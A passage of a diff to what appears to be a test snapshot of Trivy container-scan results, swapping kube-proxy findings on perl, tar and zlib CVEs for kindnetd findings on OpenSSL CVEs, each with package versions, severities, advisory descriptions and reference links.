"http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://access.redhat.com/security/cve/CVE-2022-2068", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", - ], - }, - "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", - ], - }, - "category": "Vulnerability", - "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://ubuntu.com/security/notices/USN-5488-1", }, { "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://ubuntu.com/security/notices/USN-5488-2", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://www.debian.org/security/2022/dsa-5169", }, { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://www.openssl.org/news/secadv/20220621.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "fixedVersion": "1.1.1d-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-23840", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://access.redhat.com/security/cve/CVE-2021-23840", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-23840.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", - }, + "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "openssl: integer overflow in CipherUpdate", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2021-23840", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://access.redhat.com/security/cve/CVE-2021-23840", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", - ], - }, - "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://www.debian.org/security/2021/dsa-4855", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1:1.2.11.dfsg-2+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-37434", - "installedVersion": "1:1.2.11.dfsg-2", - "packageName": "zlib1g", - "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", - ], - }, - "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://www.tenable.com/security/tns-2021-03", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://www.tenable.com/security/tns-2021-09", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://www.tenable.com/security/tns-2021-10", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1d-0+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3712", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "https://access.redhat.com/security/cve/CVE-2021-3712", + "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-3712.html", + "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://ubuntu.com/security/notices/USN-5051-2", + "https://ubuntu.com/security/notices/USN-5051-3", + "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", + ], + }, + "category": "Vulnerability", + "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "openssl: Read buffer overruns processing ASN.1 strings", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://avd.aquasec.com/nvd/cve-2021-3712", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://access.redhat.com/security/cve/CVE-2021-3712", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", }, { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", }, { "type": "URL", - "value": 